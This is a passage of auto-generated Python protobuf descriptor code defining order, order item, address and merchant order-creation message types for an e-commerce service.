serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='labels', full_name='order.MerchantOrderCreateReq.labels', index=8,
number=9, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='discounts', full_name='order.MerchantOrderCreateReq.discounts', index=9,
number=10, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='currency', full_name='order.MerchantOrderCreateReq.currency', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_MERCHANTORDERCREATEREQ_LABELSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1368,
serialized_end=1735,
)
_MERCHANTORDERCREATERESULT = _descriptor.Descriptor(
name='MerchantOrderCreateResult',
full_name='order.MerchantOrderCreateResult',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='order.MerchantOrderCreateResult.code', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='msg', full_name='order.MerchantOrderCreateResult.msg', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='order', full_name='order.MerchantOrderCreateResult.order', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1737,
serialized_end=1832,
)
_ORDER_LABELSENTRY = _descriptor.Descriptor(
name='LabelsEntry',
full_name='order.Order.LabelsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='order.Order.LabelsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='order.Order.LabelsEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=535,
serialized_end=580,
)
_ORDER = _descriptor.Descriptor(
name='Order',
full_name='order.Order',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='order.Order.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_id', full_name='order.Order.user_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='order_type', full_name='order.Order.order_type', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='status', full_name='order.Order.status', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total_amount', full_name='order.Order.total_amount', index=4,
number=6, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='items_amount', full_name='order.Order.items_amount', index=5,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='logistics_amount', full_name='order.Order.logistics_amount', index=6,
number=8, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='discount_amount', full_name='order.Order.discount_amount', index=7,
number=9, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='currency', full_name='order.Order.currency', index=8,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='country', full_name='order.Order.country', index=9,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='fulfill_method', full_name='order.Order.fulfill_method', index=10,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='store_id', full_name='order.Order.store_id', index=11,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='review_info', full_name='order.Order.review_info', index=12,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cancel_reason', full_name='order.Order.cancel_reason', index=13,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='platform_remark', full_name='order.Order.platform_remark', index=14,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='seller_remark', full_name='order.Order.seller_remark', index=15,
number=18, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_remark', full_name='order.Order.user_remark', index=16,
number=19, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='create_at', full_name='order.Order.create_at', index=17,
number=20, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='update_at', full_name='order.Order.update_at', index=18,
number=21, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='items', full_name='order.Order.items', index=19,
number=22, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='address', full_name='order.Order.address', index=20,
number=23, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='payment_type', full_name='order.Order.payment_type', index=21,
number=24, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cost_amount', full_name='order.Order.cost_amount', index=22,
number=25, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='business_code', full_name='order.Order.business_code', index=23,
number=26, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='business_type', full_name='order.Order.business_type', index=24,
number=27, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='labels', full_name='order.Order.labels', index=25,
number=28, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cancel_at', full_name='order.Order.cancel_at', index=26,
number=29, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='return_remark', full_name='order.Order.return_remark', index=27,
number=30, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='return_at', full_name='order.Order.return_at', index=28,
number=31, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='settlements', full_name='order.Order.settlements', index=29,
number=32, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='merchant_user_id', full_name='order.Order.merchant_user_id', index=30,
number=33, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_ORDER_LABELSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1835,
serialized_end=2637,
)
_ORDERITEM_SKUPROPENTRY = _descriptor.Descriptor(
name='SkuPropEntry',
full_name='order.OrderItem.SkuPropEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='order.OrderItem.SkuPropEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='order.OrderItem.SkuPropEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3349,
serialized_end=3395,
)
_ORDERITEM_LABELSENTRY = _descriptor.Descriptor(
name='LabelsEntry',
full_name='order.OrderItem.LabelsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='order.OrderItem.LabelsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='order.OrderItem.LabelsEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=535,
serialized_end=580,
)
_ORDERITEM = _descriptor.Descriptor(
name='OrderItem',
full_name='order.OrderItem',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='item_id', full_name='order.OrderItem.item_id', index=0,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='spu_id', full_name='order.OrderItem.spu_id', index=1,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sku_id', full_name='order.OrderItem.sku_id', index=2,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='title', full_name='order.OrderItem.title', index=3,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='image', full_name='order.OrderItem.image', index=4,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sku_prop', full_name='order.OrderItem.sku_prop', index=5,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='original_amount', full_name='order.OrderItem.original_amount', index=6,
number=6, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sale_amount', full_name='order.OrderItem.sale_amount', index=7,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='discount_amount', full_name='order.OrderItem.discount_amount', index=8,
number=8, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total_amount', full_name='order.OrderItem.total_amount', index=9,
number=9, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='currency', full_name='order.OrderItem.currency', index=10,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quantity', full_name='order.OrderItem.quantity', index=11,
number=11, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cost_amount', full_name='order.OrderItem.cost_amount', index=12,
number=14, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='store_id', full_name='order.OrderItem.store_id', index=13,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='product_type', full_name='order.OrderItem.product_type', index=14,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='business_type', full_name='order.OrderItem.business_type', index=15,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='supplier_id', full_name='order.OrderItem.supplier_id', index=16,
number=18, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_rebate_rate', full_name='order.OrderItem.user_rebate_rate', index=17,
number=19, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\030\001', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='channel_rebate_rate', full_name='order.OrderItem.channel_rebate_rate', index=18,
number=20, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bind_item_ids', full_name='order.OrderItem.bind_item_ids', index=19,
number=21, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='labels', full_name='order.OrderItem.labels', index=20,
number=22, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='category_id', full_name='order.OrderItem.category_id', index=21,
number=23, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_rebate_amount_limit', full_name='order.OrderItem.user_rebate_amount_limit', index=22,
number=24, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='merchant_apportion_rebate_rate', full_name='order.OrderItem.merchant_apportion_rebate_rate', index=23,
number=25, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\030\001', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='platform_apportion_rebate_rate', full_name='order.OrderItem.platform_apportion_rebate_rate', index=24,
number=26, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\030\001', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='gradient_rebate_rates', full_name='order.OrderItem.gradient_rebate_rates', index=25,
number=27, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_ORDERITEM_SKUPROPENTRY, _ORDERITEM_LABELSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2640,
serialized_end=3442,
)
_ORDERADDRESS = _descriptor.Descriptor(
name='OrderAddress',
full_name='order.OrderAddress',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='order.OrderAddress.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='mobile', full_name='order.OrderAddress.mobile', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='country', full_name='order.OrderAddress.country', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='state', full_name='order.OrderAddress.state', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='city', full_name='order.OrderAddress.city', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='district', full_name='order.OrderAddress.district', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='detail', full_name='order.OrderAddress.detail', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='postcode', full_name='order.OrderAddress.postcode', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='email', full_name='order.OrderAddress.email', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ward', full_name='order.OrderAddress.ward', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='recharge_phone', full_name='order.OrderAddress.recharge_phone', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3445,
serialized_end=3640,
)
_ORDERUPDATECONTENT = _descriptor.Descriptor(
name='OrderUpdateContent',
full_name='order.OrderUpdateContent',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='business_code', full_name='order.OrderUpdateContent.business_code', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='order_id', full_name='order.OrderUpdateContent.order_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
